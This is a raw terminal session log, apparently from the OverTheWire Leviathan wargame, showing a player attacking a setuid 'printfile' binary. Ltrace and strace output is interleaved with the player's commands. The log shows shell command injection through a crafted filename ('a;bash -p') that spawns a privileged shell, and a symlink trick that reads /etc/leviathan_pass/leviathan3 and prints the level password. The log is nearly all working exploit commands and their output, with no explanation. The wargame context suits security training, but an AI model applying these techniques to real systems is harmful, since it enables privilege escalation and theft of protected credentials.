 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                            = 0
+++ exited (status 0) +++
leviathan2@leviathan:/tmp/tab$ rm b
leviathan2@leviathan:/tmp/tab$ ln -s /etc/leviathan_pass/leviathan3 b
leviathan2@leviathan:/tmp/tab$ ltrace ~/printfile "a;cat b"
__libc_start_main(0x804852b, 2, 0xffffd664, 0x8048610 <unfinished ...>
access("a;cat b", 4)                                                              = 0
snprintf("/bin/cat a;cat b", 511, "/bin/cat %s", "a;cat b")                       = 16
geteuid()                                                                         = 12002
geteuid()                                                                         = 12002
setreuid(12002, 12002)                                                            = 0
system("/bin/cat a;cat b"/bin/cat: a: No such file or directory
cat: b: Permission denied
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                            = 256
+++ exited (status 0) +++
leviathan2@leviathan:/tmp/tab$ ltrace ~/printfile "a;bash -p"
__libc_start_main(0x804852b, 2, 0xffffd664, 0x8048610 <unfinished ...>
access("a;bash -p", 4)                                                            = -1
puts("You cant have that file..."You cant have that file...
)                                                = 27
+++ exited (status 1) +++
leviathan2@leviathan:/tmp/tab$ touch "a;bash -p"
leviathan2@leviathan:/tmp/tab$ ltrace ~/printfile "a;bash -p"
__libc_start_main(0x804852b, 2, 0xffffd664, 0x8048610 <unfinished ...>
access("a;bash -p", 4)                                                            = 0
snprintf("/bin/cat a;bash -p", 511, "/bin/cat %s", "a;bash -p")                   = 18
geteuid()                                                                         = 12002
geteuid()                                                                         = 12002
setreuid(12002, 12002)                                                            = 0
system("/bin/cat a;bash -p"/bin/cat: a: No such file or directory
leviathan2@leviathan:/tmp/tab$ touch a
leviathan2@leviathan:/tmp/tab$ ltrace ~/printfile "a;bash -p"
__libc_start_main(0x804852b, 2, 0xffffd664, 0x8048610 <unfinished ...>
access("a;bash -p", 4)                                                            = 0
snprintf("/bin/cat a;bash -p", 511, "/bin/cat %s", "a;bash -p")                   = 18
geteuid()                                                                         = 12002
geteuid()                                                                         = 12002
setreuid(12002, 12002)                                                            = 0
system("/bin/cat a;bash -p"leviathan2@leviathan:/tmp/tab$ 
leviathan2@leviathan:/tmp/tab$ 
leviathan2@leviathan:/tmp/tab$ ~/printfile "a;bash -p"
leviathan3@leviathan:/tmp/tab$ ls
a  a;bash -p  a;cat b  b
leviathan3@leviathan:/tmp/tab$ echo 3 > "a;bash -p"
bash: a;bash -p: Permission denied
leviathan3@leviathan:/tmp/tab$ ~/printfile "a;bash -p"
leviathan3@leviathan:/tmp/tab$ ~/printfile "a;bash -p ls"
You cant have that file...
leviathan3@leviathan:/tmp/tab$ ls
a  a;bash -p  a;cat b  b
leviathan3@leviathan:/tmp/tab$ rm a
rm: remove write-protected regular empty file 'a'? y
rm: cannot remove 'a': Permission denied
leviathan3@leviathan:/tmp/tab$ rm a
rm: remove write-protected regular empty file 'a'? n
leviathan3@leviathan:/tmp/tab$ cd ..
leviathan3@leviathan:/tmp$ ls
ls: cannot open directory '.': Permission denied
leviathan3@leviathan:/tmp$ mkdir food
leviathan3@leviathan:/tmp$ cd food
leviathan3@leviathan:/tmp/food$ echo 1 > a
leviathan3@leviathan:/tmp/food$ echo 2 > b
leviathan3@leviathan:/tmp/food$ ~/printfile 1
You cant have that file...
leviathan3@leviathan:/tmp/food$ ~/printfile a
1
leviathan3@leviathan:/tmp/food$ ~/printfile a b
1
leviathan3@leviathan:/tmp/food$ ls
a  b
leviathan3@leviathan:/tmp/food$ echo 3 > "a b"
leviathan3@leviathan:/tmp/food$ cat a b
1
2
leviathan3@leviathan:/tmp/food$ cat a b
1
2
leviathan3@leviathan:/tmp/food$ strace ~/printfile "a b"
execve("/home/leviathan2/printfile", ["/home/leviathan2/printfile", "a b"], [/* 27 vars */]) = 0
strace: [ Process PID=6676 runs in 32 bit mode. ]
brk(NULL)                               = 0x804b000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf7fd2000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=36357, ...}) = 0
mmap2(NULL, 36357, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf7fc9000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib32/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\204\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1787812, ...}) = 0
mmap2(NULL, 1796604, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xf7e12000
mmap2(0xf7fc3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b0000) = 0xf7fc3000
mmap2(0xf7fc6000, 10748, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xf7fc6000
close(3)                                = 0
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf7e10000
set_thread_area({entry_number:-1, base_addr:0xf7e10700, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 (entry_number:12)
mprotect(0xf7fc3000, 8192, PROT_READ)   = 0
mprotect(0x8049000, 4096, PROT_READ)    = 0
mprotect(0xf7ffc000, 4096, PROT_READ)   = 0
munmap(0xf7fc9000, 36357)               = 0
access("a b", R_OK)                     = 0
geteuid32()                             = 12003
geteuid32()                             = 12003
setreuid32(12003, 12003)                = 0
rt_sigaction(SIGINT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=0}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=0}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
clone(child_stack=NULL, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xffffd250) = 6677
waitpid(6677, 1
2
[{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0) = 6677
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, NULL, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, NULL, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=6677, si_uid=12003, si_status=0, si_utime=0, si_stime=0} ---
exit_group(0)                           = ?
+++ exited with 0 +++
leviathan3@leviathan:/tmp/food$ 
leviathan3@leviathan:/tmp/food$ 
leviathan3@leviathan:/tmp/food$ ls
a  a b  b
leviathan3@leviathan:/tmp/food$ rm b
leviathan3@leviathan:/tmp/food$ ln -s /etc/leviathan_pass/leviathan3 b
leviathan3@leviathan:/tmp/food$ strace ~/printfile "a b"
execve("/home/leviathan2/printfile", ["/home/leviathan2/printfile", "a b"], [/* 27 vars */]) = 0
strace: [ Process PID=6729 runs in 32 bit mode. ]
brk(NULL)                               = 0x804b000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf7fd2000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=36357, ...}) = 0
mmap2(NULL, 36357, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf7fc9000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib32/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\204\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1787812, ...}) = 0
mmap2(NULL, 1796604, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xf7e12000
mmap2(0xf7fc3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b0000) = 0xf7fc3000
mmap2(0xf7fc6000, 10748, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xf7fc6000
close(3)                                = 0
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf7e10000
set_thread_area({entry_number:-1, base_addr:0xf7e10700, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 (entry_number:12)
mprotect(0xf7fc3000, 8192, PROT_READ)   = 0
mprotect(0x8049000, 4096, PROT_READ)    = 0
mprotect(0xf7ffc000, 4096, PROT_READ)   = 0
munmap(0xf7fc9000, 36357)               = 0
access("a b", R_OK)                     = 0
geteuid32()                             = 12003
geteuid32()                             = 12003
setreuid32(12003, 12003)                = 0
rt_sigaction(SIGINT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=0}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=0}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
clone(child_stack=NULL, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xffffd250) = 6730
waitpid(6730, 1
Ahdiemoo1j
[{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0) = 6730
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, NULL, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, NULL, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=6730, si_uid=12003, si_status=0, si_utime=0, si_stime=0} ---
exit_group(0)                           = ?
+++ exited with 0 +++
leviathan3@leviathan:/tmp/food$ ltrace ~/printfile "a b"
__libc_start_main(0x804852b, 2, 0xffffd664, 0x8048610 <unfinished ...>
access("a b", 4)                                                                  = 0
snprintf("/bin/cat a b", 511, "/bin/cat %s", "a b")                               = 12
geteuid()                                                                         = 12003
geteuid()                                                                         = 12003
setreuid(12003, 12003)                                                            = 0
system("/bin/cat a b"1
Ahdiemoo1j
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                            = 0
+++ exited (status 0) +++
leviathan3@leviathan:/tmp/food$ 
leviathan3@leviathan:/tmp/food$ 
leviathan3@leviathan:/tmp/food$ strace ~/printfile "a b"^C
leviathan3@leviathan:/tmp/food$ 
leviathan3@leviathan:/tmp/food$ 
leviathan3@leviathan:/tmp/food$ ecxit
bash: ecxit: command not found
leviathan3@leviathan:/tmp/food$ exit
exit
leviathan3@leviathan:/tmp/tab$ exit
exit
leviathan2@leviathan:/tmp/tab$ ls
a  a;bash -p  a;cat b  b
leviathan2@leviathan:/tmp/tab$ 
